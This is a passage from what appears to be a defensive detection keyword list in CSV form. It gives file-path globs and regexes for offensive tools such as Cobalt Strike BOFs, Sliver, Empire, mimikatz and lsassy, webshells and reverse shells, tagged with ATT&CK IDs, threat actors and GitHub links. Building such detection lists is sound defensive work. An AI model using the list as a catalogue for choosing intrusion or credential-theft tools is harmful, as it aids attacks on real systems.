CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/SilentClean/SilentClean/*.cs*",".{0,1000}\/SilentClean\/SilentClean\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/SilentCryptoMiner/*",".{0,1000}\/SilentCryptoMiner\/.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*/silentdump.c*",".{0,1000}\/silentdump\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/silentdump.h*",".{0,1000}\/silentdump\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/SilentHound.git*",".{0,1000}\/SilentHound\.git.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*/SilentMoonwalk.git*",".{0,1000}\/SilentMoonwalk\.git.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","7","601","92","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*/silentprocessexit.py*",".{0,1000}\/silentprocessexit\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*/silenttrinity/*.py*",".{0,1000}\/silenttrinity\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*/simple_hijacker/*",".{0,1000}\/simple_hijacker\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/simple-backdoor.php*",".{0,1000}\/simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*/SimpleLoader.cpp*",".{0,1000}\/SimpleLoader\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/SimpleLoader.exe*",".{0,1000}\/SimpleLoader\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/SimpleNTSyscallFuzzer.git*",".{0,1000}\/SimpleNTSyscallFuzzer\.git.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005 - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","7","2","114","22","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z" "*/Simple-Reverse-Shell*",".{0,1000}\/Simple\-Reverse\-Shell.{0,1000}","offensive_tool_keyword","Simple-Reverse-Shell","Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication","T1548 - T1562 - T1027","TA0003 - TA0008","N/A","N/A","Shell spawning","https://github.com/tihanyin/Simple-Reverse-Shell/","1","1","N/A","N/A","2","116","29","2021-12-21T15:51:48Z","2021-12-19T22:16:32Z" "*/SimplyEmail.git*",".{0,1000}\/SimplyEmail\.git.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","932","243","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" "*/SingleDose.git*",".{0,1000}\/SingleDose\.git.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","1","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*/sip-brute.nse*",".{0,1000}\/sip\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sip-call-spoof.nse*",".{0,1000}\/sip\-call\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sip-enum-users.nse*",".{0,1000}\/sip\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sip-methods.nse*",".{0,1000}\/sip\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/sipvicious.py*",".{0,1000}\/sipvicious\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/Sitadel.git*",".{0,1000}\/Sitadel\.git.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*/sitadel.log*",".{0,1000}\/sitadel\.log.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*/sitadel.py*",".{0,1000}\/sitadel\.py.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*/sites-available/striker*",".{0,1000}\/sites\-available\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/sites-enabled/striker*",".{0,1000}\/sites\-enabled\/striker.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/situational_awareness/*.exe",".{0,1000}\/situational_awareness\/.{0,1000}\.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/situational_awareness/*.ps1",".{0,1000}\/situational_awareness\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/skelsec/pypykatz*",".{0,1000}\/skelsec\/pypykatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*/skypev2-version.nse*",".{0,1000}\/skypev2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Slackor.git*",".{0,1000}\/Slackor\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/Slackor.git*",".{0,1000}\/Slackor\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/Slackor/*",".{0,1000}\/Slackor\/.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/sleep_python_bridge/*",".{0,1000}\/sleep_python_bridge\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/Sleeper/Sleeper.cna*",".{0,1000}\/Sleeper\/Sleeper\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/sleepmask.cna*",".{0,1000}\/sleepmask\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/slinky.py*",".{0,1000}\/slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/SlinkyCat.git*",".{0,1000}\/SlinkyCat\.git.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*/slip.git",".{0,1000}\/slip\.git","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","1","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*/slip-main.zip",".{0,1000}\/slip\-main\.zip","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","1","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*/sliver.exe*",".{0,1000}\/sliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver.git*",".{0,1000}\/sliver\.git.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver.pb.go*",".{0,1000}\/sliver\.pb\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - 